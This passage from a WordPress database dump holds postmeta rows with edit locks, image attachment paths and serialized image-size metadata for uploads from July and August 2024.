(341,112,'_related','field_603b51c3e183e'),
(342,114,'title_style','default'),
(343,114,'_title_style','field_5d1a0217cf408'),
(344,114,'related',''),
(345,114,'_related','field_603b51c3e183e'),
(348,116,'_edit_lock','1722253757:1'),
(349,117,'_wp_attached_file','2024/07/450947325_122163136760202781_4207734148389241137_n.jpg'),
(350,117,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/07/450947325_122163136760202781_4207734148389241137_n.jpg\";s:8:\"filesize\";i:197096;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"450947325_122163136760202781_4207734148389241137_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19333;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"450947325_122163136760202781_4207734148389241137_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111938;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"450947325_122163136760202781_4207734148389241137_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8625;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"450947325_122163136760202781_4207734148389241137_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75073;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"450947325_122163136760202781_4207734148389241137_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:190693;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"450947325_122163136760202781_4207734148389241137_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21496;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(353,116,'_thumbnail_id','117'),
(354,116,'_edit_last','1'),
(356,116,'title_style','default'),
(357,116,'_title_style','field_5d1a0217cf408'),
(358,116,'related',''),
(359,116,'_related','field_603b51c3e183e'),
(360,118,'title_style','default'),
(361,118,'_title_style','field_5d1a0217cf408'),
(362,118,'related',''),
(363,118,'_related','field_603b51c3e183e'),
(364,119,'_edit_lock','1722253828:1'),
(365,120,'_wp_attached_file','2024/07/451103441_122163133106202781_910918089894319615_n.jpg'),
(366,120,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:61:\"2024/07/451103441_122163133106202781_910918089894319615_n.jpg\";s:8:\"filesize\";i:370691;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"451103441_122163133106202781_910918089894319615_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26039;}s:5:\"large\";a:5:{s:4:\"file\";s:62:\"451103441_122163133106202781_910918089894319615_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:202067;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"451103441_122163133106202781_910918089894319615_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10514;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"451103441_122163133106202781_910918089894319615_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212545;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:63:\"451103441_122163133106202781_910918089894319615_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:348389;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"451103441_122163133106202781_910918089894319615_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28154;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(369,119,'_generateblocks_dynamic_css_version','1.9.1'),
(370,119,'_thumbnail_id','120'),
(371,119,'_edit_last','1'),
(373,119,'title_style','default'),
(374,119,'_title_style','field_5d1a0217cf408'),
(375,119,'related',''),
(376,119,'_related','field_603b51c3e183e'),
(377,121,'title_style','default'),
(378,121,'_title_style','field_5d1a0217cf408'),
(379,121,'related',''),
(380,121,'_related','field_603b51c3e183e'),
(381,122,'title_style','default'),
(382,122,'_title_style','field_5d1a0217cf408'),
(383,123,'_edit_lock','1722253962:1'),
(384,124,'_wp_attached_file','2024/07/450261305_122162186144202781_7069656528638807611_n.jpg'),
(385,124,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/07/450261305_122162186144202781_7069656528638807611_n.jpg\";s:8:\"filesize\";i:234655;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"450261305_122162186144202781_7069656528638807611_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18739;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"450261305_122162186144202781_7069656528638807611_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126818;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"450261305_122162186144202781_7069656528638807611_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7759;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"450261305_122162186144202781_7069656528638807611_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80995;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"450261305_122162186144202781_7069656528638807611_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:222657;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"450261305_122162186144202781_7069656528638807611_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20781;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(388,123,'_thumbnail_id','124'),
(389,123,'_edit_last','1'),
(390,123,'title_style','default'),
(391,123,'_title_style','field_5d1a0217cf408'),
(392,123,'related',''),
(393,123,'_related','field_603b51c3e183e'),
(394,125,'title_style','default'),
(395,125,'_title_style','field_5d1a0217cf408'),
(396,125,'related',''),
(397,125,'_related','field_603b51c3e183e'),
(398,126,'title_style','default'),
(399,126,'_title_style','field_5d1a0217cf408'),
(400,127,'_edit_lock','1722254073:1'),
(401,128,'_wp_attached_file','2024/07/450250828_122162185154202781_8649375950099252526_n-1.jpg'),
(402,128,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:64:\"2024/07/450250828_122162185154202781_8649375950099252526_n-1.jpg\";s:8:\"filesize\";i:366584;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"450250828_122162185154202781_8649375950099252526_n-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25768;}s:5:\"large\";a:5:{s:4:\"file\";s:65:\"450250828_122162185154202781_8649375950099252526_n-1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:197978;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"450250828_122162185154202781_8649375950099252526_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10382;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:65:\"450250828_122162185154202781_8649375950099252526_n-1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:206696;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"450250828_122162185154202781_8649375950099252526_n-1-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:342614;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:64:\"450250828_122162185154202781_8649375950099252526_n-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28029;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(405,127,'_generateblocks_dynamic_css_version','1.9.1'),
(406,127,'_thumbnail_id','128'),
(407,127,'_edit_last','1'),
(408,127,'title_style','default'),
(409,127,'_title_style','field_5d1a0217cf408'),
(410,127,'related',''),
(411,127,'_related','field_603b51c3e183e'),
(412,129,'title_style','default'),
(413,129,'_title_style','field_5d1a0217cf408'),
(414,129,'related',''),
(415,129,'_related','field_603b51c3e183e'),
(416,130,'title_style','default'),
(417,130,'_title_style','field_5d1a0217cf408'),
(418,131,'title_style','default'),
(419,131,'_title_style','field_5d1a0217cf408'),
(420,132,'title_style','default'),
(421,132,'_title_style','field_5d1a0217cf408'),
(422,133,'title_style','default'),
(423,133,'_title_style','field_5d1a0217cf408'),
(424,134,'title_style','default'),
(425,134,'_title_style','field_5d1a0217cf408'),
(426,135,'title_style','default'),
(427,135,'_title_style','field_5d1a0217cf408'),
(428,136,'_edit_lock','1722254321:1'),
(429,137,'_wp_attached_file','2024/07/442507862_122150309288202781_2842318848400673504_n.jpg'),
(430,137,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:503;s:4:\"file\";s:62:\"2024/07/442507862_122150309288202781_2842318848400673504_n.jpg\";s:8:\"filesize\";i:46212;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"442507862_122150309288202781_2842318848400673504_n-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17579;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"442507862_122150309288202781_2842318848400673504_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7297;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"442507862_122150309288202781_2842318848400673504_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14020;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(433,136,'_generateblocks_dynamic_css_version','1.9.1'),
(434,136,'_thumbnail_id','137'),
(435,136,'_edit_last','1'),
(436,136,'title_style','default'),
(437,136,'_title_style','field_5d1a0217cf408'),
(438,136,'related',''),
(439,136,'_related','field_603b51c3e183e'),
(440,138,'title_style','default'),
(441,138,'_title_style','field_5d1a0217cf408'),
(442,138,'related',''),
(443,138,'_related','field_603b51c3e183e'),
(444,139,'title_style','default'),
(445,139,'_title_style','field_5d1a0217cf408'),
(446,140,'_edit_lock','1722254625:1'),
(447,141,'_wp_attached_file','2024/07/434328136_122134060850202781_9108992241821579810_n.jpg'),
(448,141,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:62:\"2024/07/434328136_122134060850202781_9108992241821579810_n.jpg\";s:8:\"filesize\";i:893876;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"434328136_122134060850202781_9108992241821579810_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23875;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"434328136_122134060850202781_9108992241821579810_n-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:197187;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"434328136_122134060850202781_9108992241821579810_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9194;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"434328136_122134060850202781_9108992241821579810_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117480;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"434328136_122134060850202781_9108992241821579810_n-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:357852;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"434328136_122134060850202781_9108992241821579810_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24243;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(451,140,'_generateblocks_dynamic_css_version','1.9.1'),
(452,140,'_thumbnail_id','141'),
(453,140,'_edit_last','1'),
(456,140,'title_style','default'),
(457,140,'_title_style','field_5d1a0217cf408'),
(458,140,'related',''),
(459,140,'_related','field_603b51c3e183e'),
(460,142,'title_style','default'),
(461,142,'_title_style','field_5d1a0217cf408'),
(462,142,'related',''),
(463,142,'_related','field_603b51c3e183e'),
(473,147,'_edit_lock','1722255919:1'),
(474,148,'_wp_attached_file','2024/07/434370527_122133137474202781_27711147787463551_n.jpg'),
(475,148,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1080;s:6:\"height\";i:540;s:4:\"file\";s:60:\"2024/07/434370527_122133137474202781_27711147787463551_n.jpg\";s:8:\"filesize\";i:92823;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"434370527_122133137474202781_27711147787463551_n-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14651;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"434370527_122133137474202781_27711147787463551_n-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88511;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"434370527_122133137474202781_27711147787463551_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8092;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"434370527_122133137474202781_27711147787463551_n-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59596;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"434370527_122133137474202781_27711147787463551_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20285;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(478,147,'_generateblocks_dynamic_css_version','1.9.1'),
(479,147,'_thumbnail_id','152'),
(480,147,'_edit_last','1'),
(481,147,'title_style','default'),
(482,147,'_title_style','field_5d1a0217cf408'),
(483,147,'related',''),
(484,147,'_related','field_603b51c3e183e'),
(485,149,'title_style','default'),
(486,149,'_title_style','field_5d1a0217cf408'),
(487,149,'related',''),
(488,149,'_related','field_603b51c3e183e'),
(490,151,'_wp_attached_file','2024/07/434370527_122133137474202781_27711147787463551_n-1.jpg'),
(491,151,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1025;s:6:\"height\";i:537;s:4:\"file\";s:62:\"2024/07/434370527_122133137474202781_27711147787463551_n-1.jpg\";s:8:\"filesize\";i:177082;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"434370527_122133137474202781_27711147787463551_n-1-300x157.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15597;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"434370527_122133137474202781_27711147787463551_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8355;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"434370527_122133137474202781_27711147787463551_n-1-768x402.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62810;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"434370527_122133137474202781_27711147787463551_n-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20412;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(494,152,'_wp_attached_file','2024/07/434370527_122133137474202781_27711147787463551_n-2.jpg'),
(495,152,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:863;s:6:\"height\";i:539;s:4:\"file\";s:62:\"2024/07/434370527_122133137474202781_27711147787463551_n-2.jpg\";s:8:\"filesize\";i:143410;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"434370527_122133137474202781_27711147787463551_n-2-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16548;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"434370527_122133137474202781_27711147787463551_n-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7890;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"434370527_122133137474202781_27711147787463551_n-2-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63806;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"434370527_122133137474202781_27711147787463551_n-2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20176;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(500,153,'title_style','default'),
(501,153,'_title_style','field_5d1a0217cf408'),
(502,154,'title_style','default'),
(503,154,'_title_style','field_5d1a0217cf408'),
(506,158,'_edit_lock','1723694095:1'),
(507,159,'_wp_attached_file','2024/08/453971114_122167799222202781_3841640128629440766_n.jpg'),
(508,159,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:4:\"file\";s:62:\"2024/08/453971114_122167799222202781_3841640128629440766_n.jpg\";s:8:\"filesize\";i:284535;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"453971114_122167799222202781_3841640128629440766_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23556;}s:5:\"large\";a:5:{s:4:\"file\";s:64:\"453971114_122167799222202781_3841640128629440766_n-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:159560;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"453971114_122167799222202781_3841640128629440766_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7903;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"453971114_122167799222202781_3841640128629440766_n-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103104;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"453971114_122167799222202781_3841640128629440766_n-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:278357;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"453971114_122167799222202781_3841640128629440766_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19259;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(509,160,'_wp_attached_file','2024/08/453848866_122167799348202781_4165394554637799009_n.jpg'),
(510,160,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1452;s:4:\"file\";s:62:\"2024/08/453848866_122167799348202781_4165394554637799009_n.jpg\";s:8:\"filesize\";i:194157;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"453848866_122167799348202781_4165394554637799009_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18747;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"453848866_122167799348202781_4165394554637799009_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111278;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"453848866_122167799348202781_4165394554637799009_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8533;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"453848866_122167799348202781_4165394554637799009_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73991;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"453848866_122167799348202781_4165394554637799009_n-1536x1089.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1089;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194039;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"453848866_122167799348202781_4165394554637799009_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17914;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:15:\"พาฝัน\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(511,161,'_wp_attached_file','2024/08/454267525_122167799384202781_905961670854441852_n.jpg'),
